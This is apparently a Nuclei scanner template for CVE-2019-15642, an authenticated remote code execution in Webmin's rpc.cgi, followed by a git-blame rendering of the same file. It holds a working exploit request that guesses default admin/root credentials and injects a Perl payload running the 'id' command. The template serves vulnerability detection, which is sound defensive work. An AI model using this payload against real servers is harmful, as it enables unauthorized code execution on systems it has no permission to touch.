nuclei-templates/http/cves/2019/CVE-2019-15642.yaml

id: CVE-2019-15642

info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
    - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index
    - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37
    - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-15642
    cwe-id: CWE-94
    epss-score: 0.22278
    epss-percentile: 0.9605
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: webmin
    product: webmin
    shodan-query:
      - title:"Webmin"
      - http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2019,webmin,rce
variables:
  cmd: '`id`'

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate

        user={{username}}&pass={{password}}
      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate

        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";

    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root
    stop-at-first-match: true
    host-redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'

      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b9988b212c5ff3a4d1b56f624dba6eb8bc04332263598e77107cd4549e02fb43022062a1278076d1dd9bef5a95eaebc2def66b8b6f960460ca7e4efe13e13cd5e377:922c64590222798bb761d5b6d8e72950
Update CVE-2019-15642.yaml 2023-08-13 00:33:31 +00:00			`id: CVE-2019-15642`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00
			`info:`
			`name: Webmin < 1.920 - Authenticated Remote Code Execution`
			`author: pussycat0x`
			`severity: high`
			`description: \|`
			`rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`remediation: \|`
			`Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2019-15642`
			`- https://github.com/jas502n/CVE-2019-15642`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`- https://doxfer.webmin.com/Webmin/Webmin_Servers_Index`
			`- https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37`
			`- https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2019-15642`
			`cwe-id: CWE-94`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.22278`
			`epss-percentile: 0.9605`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`cpe: cpe:2.3:a:webmin:webmin::::::::`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`metadata:`
TemplateMan Update [Thu Aug 10 05:39:25 UTC 2023] :robot: 2023-08-10 05:39:25 +00:00			`verified: true`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`max-request: 4`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: webmin`
			`product: webmin`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"Webmin"`
			`- http.title:"webmin"`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: title="webmin"`
			`google-query: intitle:"webmin"`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`tags: cve,cve2019,webmin,rce`
			`variables:`
			cmd: '`id`'

			`http:`
			`- raw:`
			`- \|`
			`POST /session_login.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: redirect=1; testing=1`
Update CVE-2019-15642.yaml 2023-08-10 04:45:43 +00:00			`Origin: {{RootURL}}`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`Content-Type: application/x-www-form-urlencoded`
Update CVE-2019-15642.yaml 2023-08-10 04:45:43 +00:00			`Referer: {{RootURL}}`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`Accept-Encoding: gzip, deflate`

			`user={{username}}&pass={{password}}`
			`- \|`
			`POST /rpc.cgi HTTP/1.1`
Update CVE-2019-15642.yaml 2023-08-09 13:29:21 +00:00			`Host: {{Hostname}}`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
Update CVE-2019-15642.yaml 2023-08-10 04:45:43 +00:00			`Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`Accept-Encoding: gzip, deflate`

			`OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";`

			`attack: pitchfork`
			`payloads:`
			`username:`
			`- admin`
			`- root`
			`password:`
			`- admin`
			`- root`
added stop-at-first match 2023-08-10 05:33:58 +00:00			`stop-at-first-match: true`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`host-redirects: true`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body_2`
			`regex:`
			`- 'uid=(\d+)\(.?\) gid=(\d+)\(.?\) groups=(\d+)\(.*?\)'`

			`- type: word`
added stop-at-first match 2023-08-10 05:33:58 +00:00			`part: body_2`
Webmin < 1.920 - Authenticated Remote Code Execution 2023-08-09 11:58:16 +00:00			`words:`
			`- "Content-type: text/plain"`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022100b9988b212c5ff3a4d1b56f624dba6eb8bc04332263598e77107cd4549e02fb43022062a1278076d1dd9bef5a95eaebc2def66b8b6f960460ca7e4efe13e13cd5e377:922c64590222798bb761d5b6d8e72950`